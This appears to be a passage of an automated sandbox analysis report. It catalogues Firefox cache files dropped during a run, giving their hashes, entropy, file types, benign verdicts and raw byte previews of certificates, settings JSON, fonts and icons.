                                                                                                                                                                                  Preview:{"metadata":{},"timestamp":1708509430155,"changes":[{"id":"0e543556-43bf-3139-1fda-2a0068116c6d","last_modified":1701990003977,"bucket":"blocklists","collection":"certificates","host":"firefox.settings.services.mozilla.com"},{"id":"19e79f22-62cf-92e1-c12c-a3b4b9cf51be","last_modified":1603126502200,"bucket":"blocklists","collection":"plugins","host":"firefox.settings.services.mozilla.com"},{"id":"b7f595f9-5fc5-d863-b5dd-e5425dcf427a","last_modified":1604940558744,"bucket":"blocklists","collection":"addons","host":"firefox.settings.services.mozilla.com"},{"id":"061d4584-acd0-fecc-b5fb-dcfe0ad5e123","last_modified":1624388514784,"bucket":"blocklists","collection":"qa","host":"firefox.settings.services.mozilla.com"},{"id":"3fadb169-e5de-a2f0-374e-6eeb3eac3dbb","last_modified":1692730580117,"bucket":"blocklists","collection":"gfx","host":"firefox.settings.services.mozilla.com"},{"id":"c521b443-368f-2e18-a853-066abaa1e9e3","last_modified":1708000561099,"bucket":"blocklists","collection":"ad

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\79B11E5B2A73707AF920FBB504E5C456E1698B13

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15844
                                                                                                                                                                                  Entropy (8bit):5.972901528432223
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:m7VqN4mApqN3Xo70tNo+pwPm082nyFz/iBY:TApQHkKo+pwPo2C
                                                                                                                                                                                  MD5:CBE0351FC76E873EC16491586802CA21
                                                                                                                                                                                  SHA1:D5F478368D65792CEFE1600B22A7C0B1D73AD26E
                                                                                                                                                                                  SHA-256:BC6DC35E0126B99B5F1B8C49FCB6A17FE989B09C02B0CB1DB53F45AF743D25DD
                                                                                                                                                                                  SHA-512:A46FD3EA895ACE389AA834AAFB6B14BDB6AB78A246A2C132CD53D42D29648BBAE3D72BCC2ADD8244D529353AA63F631C055654C8D70644ECE7DA548CF8230257
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:................e...F.B.e......E....O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/.strongly-framed.0.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFJDWIvFi4WYw5Ts43/kaYiM+0kSvMB8GA1UdIwQYMBaAFIp0f6+Fze6VzT2c0OJGFPNxNR0nMGoGCCsGAQUFBwEBBF4wXDAnBggrBgEFBQcwAYYbaHR0cDovL29jc3AucGtpLmdvb2cvZ3RzMWMzMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxYzMuZGVyMIIJ7wYDVR0RBIIJ5jCCCeKCDCouZ29vZ2xlLmNvbYIWKi5hcH

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\7B4938FCB3A0B5AF816D28C89953E3993F95E450

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 839319552
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12760
                                                                                                                                                                                  Entropy (8bit):6.6981267822149455
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:+SjfqLomzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDx8CvDxP:NUzSWvoI8zSWvoIBHJmvOk
                                                                                                                                                                                  MD5:0726A4BE3F5057A78F42CE762F8B3008
                                                                                                                                                                                  SHA1:F11D60AB021ECF03D71F6EF6E61C440E115F3650
                                                                                                                                                                                  SHA-256:1A0A55B9BFB20D62DD85F139C942E30943C0B3C1D2E5FA170B9E7B1B2082A795
                                                                                                                                                                                  SHA-512:912174D86798A6E2C966ED65622634C654804DDC2F700FA48C54A7BD92ECB86F905090D7B4C8848207FF7ED2CEC818AD1E3B65592B04DF646347E5C53C22E8DA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........W.R.8...S..N*...3..Y..!.Z(P..0.YV...e.!....Hr.1..e2....;..I.[y."Q .?.$/x.w..#v.QuD8O.H....g.O...eRD...%".Z1.r......+D:I..[.O.......?.{.D.Q.`...p.FI.N.M.f.5.Mz.g...<.=a...?.j...e.-yp2..1.`...(gG....:.2.pF...sO..s...E.,.*-.b6...Wl.,&*iql..f.P?..23:.x.ZzX.N.2..{...|.=..x!.6.....n.Z...^vBm[0.g...76.^2.c.L*.R.N...../.....h.._.{.e..f.d,E..]..z.....L/UX...+.9.e./.... p.A<..f...d...k...+..#........`...g.....0..>.~.......O......G..p.HX1...|../....Gw)U<l=..3T....^f..Hi.h.$.v..B%ST[D.Lix,e,`0O........B........D.e.M.B>...U)R....]k.........\~u7L...r..>b..`4.o....1..tp.0I.8.D....;.0aJ....8j..,....M.X.......|.?6.C.(.J.#,.N+\.TOp...Y..x./.v..Z.H.V.C...!...hF..z.>.Bv.CZ..8..+>..Un....4.xR....cq..!h..U6.T..8...Y...i..x$U...A.i...P.....>:.......J..y....".".....6,...H./P.4@5..5o!..&Uw...V.kZ...~K.|_...jE...@....8....y.8.....O.......|g}.."<.. ..@{lW_..P.p.$.<........&..~.r ..m.!TJ...z......8..!.s.x.rF....o$XE.....(7Op......?..`.i0R.A....H..(..v........m.bV.s.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\7D140FC8B10FA0CFC53F8E57E0114852088512C9

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15744, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24007
                                                                                                                                                                                  Entropy (8bit):7.766896981694014
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:z1TLklSElcS5V6qQTMUP07JwirW6RlLwK79T92MtV0rAD0PTaIdNrp:p7EJ5E2bJwi5jLwK79TsMtVpD0La8/
                                                                                                                                                                                  MD5:854A568C4ECE8D7F6B91135464ABD9FC
                                                                                                                                                                                  SHA1:3813A74B71CE5E37D04AD5289647FD604AAB23EE
                                                                                                                                                                                  SHA-256:530F55949B71EDF7CDA26B1F59E0603B4F338990429ABBDA29BA7B8F53392747
                                                                                                                                                                                  SHA-512:348BECEBB3B0AD4AB33CB41C277C024CD64919DB980587161A284C1573A8B000CF04970E21B8730CE7E0E72C4FAE5E52312DB0F6EB14A6C877A81FBFE08B3FD1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:wOF2......=........t..=..........................d..d..^.`.. .T..<.....|..{........6.$.... ..t. ..I.3.%.....8..&....4Z.|t .8.........D...$.uNE.P.E.Ak...=.x.9Xz.`.I..R....#F+B`..}.RP|E...Z\.W[.............C...QB....m...cm.?.F.g.......Q....3......p...L2.[......!+@U..^~.......D.?.......j...U...c..U.l.6{...m.CD].h.t.....Q8.....@P...L.c.....+...ZD..2.K...:..4{g..:..~....v......<..H^.R.'....8....?.;...uy.VW..8=.".F..*.....@E....c....=..Ib.....y8$.a){.......KiIW.&..~.}..1..w.M..{.4......!..{..F.H.5#K...t..5.w...ve;. '......NJ......'(%;...?...D...M.Cq,<.=?.f......._...V..bA.(..37..v....+.uY.C.b.w8AF..3.n.-..'..U%.2....o.l."...^bj..aoF.!`....A....j...'.:Z.u...[..p.GW:U%.Ejq...:I...C........S.C...sJe.6D...<.UM,..&h..z}.y|..9...D..j...n..B.$..T....?../.Q..=B...C._.f.#.:Bo.@]T.(..v..F..+d...". ......R..R..R....!..~A....X............>!`p..,08. 9.../.....r..Q.......Qpg.\ko...C..3..Y.y..t'.d9..>#|..3..?.#..$....i........g5.z....S....{3..Sp..S2..w.6........

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\82EADA02EB2F348094F75E8B97E475ADAEA6DEAA

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.040561992250005
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:n0MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckNLUcuNLc:njWebV2GZuZrFK0k0t7qW0NbZovEpau
                                                                                                                                                                                  MD5:980C160C26DCA09716A0289639F2A276
                                                                                                                                                                                  SHA1:29ABC5C20A253FB45DC37DC2F31D0516A7867626
                                                                                                                                                                                  SHA-256:6516F0556F5FFBC8F65BEAE0FE642372318FBB44A91AE5E7DEF7951DADB421AC
                                                                                                                                                                                  SHA-512:B3CBFF4ABCCB2EB0AE89E0B07F05C25080277CA922065F517C5BFE14CD7608EC6B35A764D9BA1D423E8503EBAD50F6720589B6BF5C3057411DA20EF27FC7B26D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...g........e...e...F.A.e......z....a,~1708514997,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/newtab/1/dd74a7e7-e73b-4ab9-8964-ca5c53c60966.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8hszS

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\8540EC873F08CBAD5DF5121BD3BABF95624B4A14

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13341
                                                                                                                                                                                  Entropy (8bit):5.918380210254339
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:wI6t3qWceBPG0rJ4XbfAzUUV+S0t7MVkyfXfbaI8j3qt0ww0wg:P6AW7BHrkb4XV+S0mVkEXTaIdf
                                                                                                                                                                                  MD5:8165221144DD25C8ABEFD4C9A1B2C867
                                                                                                                                                                                  SHA1:3D88C368A39ABDA9777C488D2EB0234EE7CC8414
                                                                                                                                                                                  SHA-256:B3F42EA56A68CD3D8F076ACFAAC151955032FD649E2486114F2DC533D228CCD4
                                                                                                                                                                                  SHA-512:5CCC34348F1E3E89F4085763B9DFCCE3B1D608CE1E386612B989A3CDA961F81549FF8966BFC5EF9C03E7A0103F5EC1A9B4B0352F122D84646F172F9C43BF3F06
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\8576048EBBDD5397F8BCB162BD229ECEBD85DAEA

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15851
                                                                                                                                                                                  Entropy (8bit):6.041703573725303
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Z37VqN4mApqN3Xo70tNo+pwPm082nyFz/aZz:ZMApQHkKo+pwPo25
                                                                                                                                                                                  MD5:8E2877E06C0778AF64B131FC0713F0C4
                                                                                                                                                                                  SHA1:DCB59931ADB2324104B0466E2CF492EA8C2529AA
                                                                                                                                                                                  SHA-256:8037D84BA5237ED643926287F76F86ACC00EBFDE33FA2A971EE85E7F7D81327E
                                                                                                                                                                                  SHA-512:FDEB9E33DC6C1B0B59EFE8B76F684C7B8CFE71F33DCA3C3703F166A1F883066FDFDE749F9A938C182477BF93B8EA299A0D95687A72513F1B4A42C1DC4170F17D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..#. .o......`..............d.<.......|e.......>8.r[.. F=..h...I.......*.M..p.....B(......=.....i..I,.'..a....c.=~.V..%.)k.7.S.G......N-=.......I...\n..\..........e..#e..#F.+.g......d....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/87423d78/img/favicon.ico.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFJDWIvFi4WYw5Ts43/kaYiM+0kSvMB8GA1UdIwQYMBaAFIp0f6+Fze6VzT2

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\8890A1FFF6A635F3C1D09180CF09237EC3AD1C08

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9014
                                                                                                                                                                                  Entropy (8bit):6.11321858429258
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:pRCBzco+xweyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdUWX7dUWXF:pRaeLYGBRohB1r1uk/KiFTaIda1J1V
                                                                                                                                                                                  MD5:EB8BAF34588F185A67485BDE9DAF24F4
                                                                                                                                                                                  SHA1:CC308C9DC1D0684C64031AEB48CF7EFDB996CD0A
                                                                                                                                                                                  SHA-256:81DD958A84C6AD537933D3D403E1BDB75EC561CEACBC80F56D3D62C9237D85B7
                                                                                                                                                                                  SHA-512:B7AF0E677592E04A4872BD38E119A12FA36E705E5B250A1AE11C4ED10E4E22B2E39DDE73C1E511DC7F0C19CB0709D327C4ED44468C8EED93A390377ED8CDFE7C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","required":["name","version"],"properties":{"id":{"type":"string"},"name":{"type":"string","title":"Name","description":"The name of the language identification model"},"version":{"type":"number","title":"Version","description":"The version of the model"}}},"signature":{"ref":"ip57e54ci38236p3t263n2sbd","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"zK9RtbyDxUlnjIjsZJo8yNFPu4wDmnboozsGT0bV1ewh5kemUYhCQ3yyCCTrTaNax7ma_vhjqOnrpsfTCYeNpfURtUcMiJlzACRj6EvNXS8SxAfjWG63d-X1kCsoIc_H","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"attachment":{"enabled":true,"required":false},"displayFields":["name","version"],"id":"tr

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\8A4AD299B2F0E55A552D3CB09E7A57213CF46041

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9271
                                                                                                                                                                                  Entropy (8bit):6.117123063434393
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:mKBdn22eyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdxjdxg:BveLYGBRohB1r1uk/KiFTaIda/G
                                                                                                                                                                                  MD5:514708490B806DFBE6B47528F23DFDEE
                                                                                                                                                                                  SHA1:1F5201B2E0597D568DAA670AF091CF29F5AC4271
                                                                                                                                                                                  SHA-256:B12ED5645C6AEA1BCD70E63DB08811C476154BB4AE23B11E63A315C0A2567290
                                                                                                                                                                                  SHA-512:0699DB483BFBAF111621B06CFF76FAAC3A0B7D397084B78E5552A2AAA4F3ED2614B407381A19972667CAA680DDE92E62D2A566424EBB3B59935991A0E4999AA0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","required":["pattern","feature"],"properties":{"feature":{"type":"string","title":"Feature","description":"Which feature this entry applies to (e.g. tracking)"},"pattern":{"type":"string","title":"Pattern","description":"Site hostname pattern to match"}},"description":"Skip list entry for URL-Classifier features"},"signature":{"ref":"f7gb49joer44oj444icke5pg","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"7oKOeBwIWvnMriJvTmMA5c029vj1mrz6Ea6KNsT10H5dG0y_Zt0cA60N8Ie9-NS1ZXkZK1QKX5VjVZpWTd7lSGHQImlzMQYJ3CZewHTDo28ezppFG-YeucsMt0cJWAER","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"displayFields":["pattern","feature"],"id":"url-classifier-skip-urls",

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\90E3B6BEE46D1AC254C7CAFDFE0179577F7F8C96

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14644
                                                                                                                                                                                  Entropy (8bit):5.906857716046348
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:N7VqN4mApqN3Xo70tNo+pwPm082nyFz//:2ApQHkKo+pwPo2I
                                                                                                                                                                                  MD5:96241E97254D3ADA133F3717E7667138
                                                                                                                                                                                  SHA1:7BF244795AFEA5BCAD20028FB7293A2770D78D4E
                                                                                                                                                                                  SHA-256:5B77F864E259BF718667CF7CE49FA3E0AA6799A8E1F2FC576987A8DC1634B6D8
                                                                                                                                                                                  SHA-512:6F0D0271938D2082A66860867D659C02961A17D19FD1AEA0BA852BB2BF18513690AFE5D64378110C1BA040D73A841AC51208D54A4CF5328372AFDD952BFDFC1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..RZ........e...e...F.B.e......X....O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/generate_204?E7f5BQ.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFJDWIvFi4WYw5Ts43/kaYiM+0kSvMB8GA1UdIwQYMBaAFIp0f6+Fze6VzT2c0OJGFPNxNR0nMGoGCCsGAQUFBwEBBF4wXDAnBggrBgEFBQcwAYYbaHR0cDovL29jc3AucGtpLmdvb2cvZ3RzMWMzMDEGCCsGAQUFBzAChiVodHRwOi8vcGtpLmdvb2cvcmVwby9jZXJ0cy9ndHMxYzMuZGVyMIIJ7wYDVR0R

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\9769D7AE21EF3085C7D867F7420C21165722E79A

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 3791781888
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11627
                                                                                                                                                                                  Entropy (8bit):6.407355174506837
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:yu8I58mq4WAcYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvDXhwH:yBefqlymzwTWvoglJmzwTWvogrBHJm2R
                                                                                                                                                                                  MD5:722A3785FDD34731BE3D5A65AD4F59E0
                                                                                                                                                                                  SHA1:956828EBEE93B34FE92AB0987BF5DCE36EBFBC3C
                                                                                                                                                                                  SHA-256:56C3606A6F221E909729F21AA64C2C7BB966F525AB3D1ADCADF664CE8A5C1DB6
                                                                                                                                                                                  SHA-512:4A92E53BB36475C56E9C0DDD7B7467D46898E5FEDD0070B0A7776E9CFD5C45025DAE05532412B7A5D312ED27BB21CC442C4E007A51B8FFB191F5B2C877292F86
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........T.n.@.}.W.~.v..T.*U....!m..WU.a.01Y0,qR.W....M.'.ag..9g....+[..N|.H+.(.:...yml.9M......wwM.6..a.7.X....uW.ly..,.d.zqr=..HA.3........6@.(8..Y.\.@x..G.(..#h..j}......g}..@./...q.7%.4.w..... )....ens{[........u.PlSa.........i..O..!.!.9......>L..p!.......S0MQ8..1...K6..>.sJ..7j.<....b..4.Wd1B...C.t..8.z.g.........5.+O.2.....l.....cu.<..*.=....tIh...!./...)e.....r[..p.1....X3.....v_.............K.....iF..^4.U.}.b..hU}z.5.I..Q.Z....L..3...o_...F....^.bP..W.x@1s.u..$kEQR.c.5.......xL<.f...-......y./i.{.Pln.l...;}#A.........1..&....4.......y.\.X*0.;$.......,.(7..R<..\cV..(8...W...X2U.....U.&t..t.....XF..q?x.....|..aI.b...v.u..f..(...j.z.l.@..WEp.....Z.g......=.>~..IF.3.a....Y.@....^...g........e...e...F.A.g......g....O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.D0FJR7J34cc.L.F4.O/am=P2CJhmMBEJhZTvP3jJPDAAAA

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\97AE667565B6120DDEBF42730CC21468FE5AC36E

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):191
                                                                                                                                                                                  Entropy (8bit):4.982175558053957
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:D9yl/mrJZPRRl/rlljXvX3XDkySLYXqhJX8sX3uOX8sXzLWzQ//tsXzHwLf3G9Ls:hRlxLhLXDOLYX2qsH3X8sXWzgtsDH+f7
                                                                                                                                                                                  MD5:3154ADB35EDDA1F9ACC8A0E431C1E75E
                                                                                                                                                                                  SHA1:4308AA22EBD45A41364D8492703B525880EDDBA8
                                                                                                                                                                                  SHA-256:BCE4A6BF670310ED7C42B7FD37486C3AD56B120F6A85933EF0FFD7E27BFAAED3
                                                                                                                                                                                  SHA-512:21F5E846BE9054BDD1036E3ADCC2B8AA323A2E87707F5E1BF4A8531AA25343862F98BA6FEB31694AD13FFE54EF23A3C7F2C70A2CF944029AABB2DAFEE6A5C069
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............e...e...F..........,....~predictor-origin,:https://www.facebook.com/.predictor::seen.1.predictor::resource-count.1.predictor::https://static.xx.fbcdn.net/.1,6,1708515099,4096.....

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\9A264EFEA14C043A84240DE25C759F48DC6E10C3

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9331
                                                                                                                                                                                  Entropy (8bit):6.128476061613573
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zBpduN1xT4CIeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdpXGdpXi:u4peLYGBRohB1r1uk/KiFTaIdap6pS
                                                                                                                                                                                  MD5:9AA3AD3979D9FA7B614EDEAF4CB7C159
                                                                                                                                                                                  SHA1:A4EAA38FD4615DB4942F353B4FA00C06E8E13CB8
